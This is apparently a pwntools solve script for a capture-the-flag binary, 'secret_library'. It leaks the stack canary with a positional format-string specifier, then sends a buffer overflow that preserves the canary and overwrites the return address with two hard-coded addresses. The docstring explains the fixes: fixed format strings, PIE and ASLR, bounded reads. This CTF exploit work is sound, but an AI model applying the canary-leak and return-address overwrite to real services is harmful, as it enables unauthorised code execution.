#!/usr/bin/env python3
"""CTF solve script for the ``secret_library`` challenge binary.

Flow, as visible in this script:
  1. Send a positional ``%<n>$lx`` format specifier and parse the hex value
     the service prints back; that value is treated as the stack canary.
  2. Send an overflow that rewrites the canary slot with the leaked value,
     fills the saved-rbp slot, and replaces the return address with two
     hard-coded code addresses.

Defensive reading: the stack protector is only as strong as the secrecy of
the canary. Step 1 works only if the target passes user input as a format
string (inferred from the reply containing the requested value); a fixed
format such as printf("%s", buf) and building with -Wformat-security closes
that leak. The hard-coded 0x40.... addresses suggest a non-PIE build
(assumption, checksec output is suppressed here); PIE plus ASLR would make
them unpredictable. The overflow itself needs a bounded read to be fixed.
"""
from pwn import *

# Positional-argument index that yields the canary in the format-string leak.
CANARY_POS = 23
# Number of filler bytes between the start of the input and the canary slot.
CANARY_OFF = 136

# Two addresses written over the saved return address, in order.
# NOTE(review): their roles are not visible from this script -- presumably a
# bare `ret` for stack alignment followed by the target function; confirm
# against the binary.
CHAIN_FIRST = 0x40101a
CHAIN_SECOND = 0x401262

elf = ELF("./secret_library", checksec=False)
context.binary = elf  # sets arch/word size used by p64() and flat()

# Local alternative to the remote target:
# io = process(elf.path)
io = remote('offsec.m0lecon.it', 13501)

# Banner / first prompt.
print(io.recvline())

# Stage 1: request the canary via a positional format specifier.
leak_request = f"%{CANARY_POS}$lx".encode()
io.sendline(leak_request)

# The reply is expected to be comma-separated with the leaked hex value in the
# second field; an unexpected reply raises IndexError/ValueError here.
reply_fields = io.recvline().split(b",")
leak_hex = reply_fields[1].strip()
print(leak_hex)
canary = int(leak_hex, 16)

# Second prompt.
print(io.recvline())

# Stage 2: overflow that keeps the canary intact so the epilogue check passes.
padding = b'A' * CANARY_OFF
saved_rbp_filler = b'B' * 8  # occupies the saved rbp slot
payload = flat(
    padding,
    p64(canary),
    saved_rbp_filler,
    p64(CHAIN_FIRST),
    p64(CHAIN_SECOND),
)
io.send(payload)

print(io.recvline())
# print(io.recvline())
io.interactive()